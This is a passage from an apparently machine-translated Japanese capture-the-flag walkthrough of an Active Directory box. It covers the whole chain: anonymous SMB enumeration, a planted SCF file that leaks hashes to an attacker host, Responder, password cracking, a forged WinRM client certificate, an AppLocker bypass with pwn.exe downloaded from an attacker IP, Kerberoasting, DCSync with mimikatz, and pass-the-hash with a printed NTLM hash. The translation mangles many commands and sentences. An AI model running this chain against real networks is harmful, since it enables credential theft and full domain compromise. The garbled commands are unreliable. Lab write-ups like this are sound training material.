箱をハック - それはドメイン証明書に来る前に、何を理解する方法はありませんが、要約浸透過程をジュージューという音

 ノートには、前に持ち越さ

---

 

図1は、エアリンクの確立は、smbclientので共有ビューに、443を開い

smbclientの-N -L \\\\ 1.1.1.1

部門の株式

操作シェア

CertEnroll

3株は、デフォルトの共有ドメイン証明書サービスであります

 

図2は、ローカルにマウント共有しました

RW -o -t CIFSマウント、ユーザー名=ゲスト、パスワード= '//10.10.10.103/Department株式' / mntに

CDを/ mnt

 

3ビュー共有ディレクトリの書き込み可能なディレクトリ

＃！/ binに/ bashの

リスト= $（見つけるの/ mnt -type D）

$リストでdに関する

行う

   タッチ$ D / X 2>を/ dev / null

   もし[$ - ？EQ0]

   それから

       エコー$ dは、「書き込み可能です」

   されます

完了

 

ハッシュを取得する書き込み可能なディレクトリのファイルに入れて4 SCF、オープン応答モニタ

[シェル]

コマンド= 2

IconFile = \\ 10.10.14.3 \共有\のpwn.ico

[タスクバー]

コマンド= ToggleDesktop

 

CP pwn.scfを/ mnt /ユーザ/公開

CP pwn.scfを/ mnt / ZZ_ARCHIVE

レスポンダ-I tun0

 

5パスワードを取得し、ハッシュをクラック

ジョン・ハッシュ-w = /パス/に/ rockyou.txt

 

図6は、スクリプトを使用してPSRemotingを使用しようと、5985を開設しました

https://github.com/Alamot/code-snippets/blob/master/winrm/winrm_shell.rb

失敗は、その使用証明書の認証サーバを見つけました

 

7証明書を作成します。

パスワードは、着陸ポート443 AD CS / certsrvなどの目の前で見ることができます

二回一貫性のあるパスフレーズの作成時に指定

証明書署名要求CSRを作成します

opensslのgenrsa -out -des3 amanda.key 2048＃作成した秘密鍵

openssl reqが-new -key amanda.key -out amanda.csr＃CSRを作成します

 

8 winrm_shell.rbスクリプトを変更

CONN = WinRMの:: Connection.new（

   エンドポイント：「https://10.10.10.103:5986/wsman」

   交通：：SSL、

   ：CLIENT_CERT => 'certnew.cerを'、サーバーから＃

   ：client_key => 'amanda.key'、＃秘密鍵

   ：no_ssl_peer_verification =>真

）

 

rlwrapルビーwinrm_shell.rb

 

9契約製CC

 

AppLockerの実行ランチャーをバイパスする10のダウンロードと使用色

wgetのhttp://10.10.16.3/pwn.exe -O pwn.exe

CPのpwn.exeのC：\ WINDOWS \ System32に\スプール\ドライバ\色

C：\ WINDOWS \ System32に\スプール\ドライバ\カラーの\ pwn.exe

 

11取得SPN

シェルSETSPN.EXE -t HTB -q * / *

 

12 kerberoast

以前に生成されたトークンパスワードを使用して、まず

MakeTokenユーザーdomianパス

kerberoast spn_user

hashcatブレーク

hashcat -m 13100 -a 0 spn_user rockyou.txt

 

同じように、バックシェルで新しいユーザーをプレイ13

 

14 PowerViewには、ACL構成エラーを検出する使用

1つのwgetのhttps://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1

2 PowerShellImport PowerView.ps1

 

 

PowerShellには、Get-ObjectACL "DC = HTB、DC = local" を-ResolveGUIDs | ？{（$ _。ActiveDirectoryRights -match 'GenericAll'） - または（$ _。ObjectAceType -match 'レプリケーション-ゲット'）}

 

私たちは、オブジェクトが権限DS-レプリケーション・ゲット・変更・すべての権限を持っていることがわかりました

新たに取得し、そのユーザーに属しています

 

15ユーザーDS-レプリケーション・ゲット・変更-すべての権限この権限ができ、直接dcsyncがあります。

DCSync管理者htb.localのシズル

またはmimikatzを使用

mimikatz lsadump :: dcsync /ユーザー：管理者/domain:htb.local / DC：ジュージューという音

 

16またはPSEXEC wmiexec PTHと

wmiexec.py [email protected] -hashes

336d863559a3f7e69371a85ad959a675：f6b7160bfc91823792e0ac3a162c9267